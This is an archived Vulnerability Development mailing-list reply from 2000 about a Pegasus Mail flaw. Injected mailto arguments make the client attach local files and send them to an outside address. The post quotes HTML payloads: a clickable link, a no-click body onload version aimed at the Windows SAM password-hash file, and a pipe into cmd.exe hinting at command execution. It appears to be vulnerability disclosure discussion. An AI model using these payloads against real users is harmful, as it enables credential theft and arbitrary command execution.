Vulnerability Development mailing list archives
Re: Pegasus Mail
From: H D Moore <hdm () SECUREAUSTIN COM>
Date: Mon, 2 Oct 2000 22:44:35 -0500
Imran Ghory wrote:
When using the following html, <a href="mailto:hacker () hakersite com -F c:\test.txt"> Click here</a> When the user clicks on "Click here" Pegasus mail will automatically creates a message which has a copy of the file "c:\test.txt" and is addressed to "hacker () hakersite com" and queues it ready to be sent without any further user intervention. If instead of "hacker () hakersite com" we have a local user, "hacker" the message won't be queued but just sent immediately. As inorder to have files stolen the user would have to click on the dubious looking link, is this security risk serious ?
YES, the use doesnt even need to click on the link though. Imagine a page like: <body onload="mailto:hacker () hakersite com -F c:\winnt\repair\sam._"> There goes your user account/hash database. Have you tested to see what pipes do? Example: <body onload="mailto:hacker () hakersite com -F c:\winnt\repair\sam._ | cmd.exe /c echo I can any command I want">
Current thread:
- Pegasus Mail Imran Ghory (Oct 02)
- Re: Pegasus Mail Peter Pentchev (Oct 03)
- Re: Pegasus Mail Helmut Springer (Oct 03)
- Re: Pegasus Mail H D Moore (Oct 03)
- Re: Pegasus Mail Knud Erik Hojgaard - CyberCity Support (Oct 03)
- Re: Pegasus Mail Bernie Cosell (Oct 03)
- <Possible follow-ups>
- Re: Pegasus Mail Brad Griffin (Oct 03)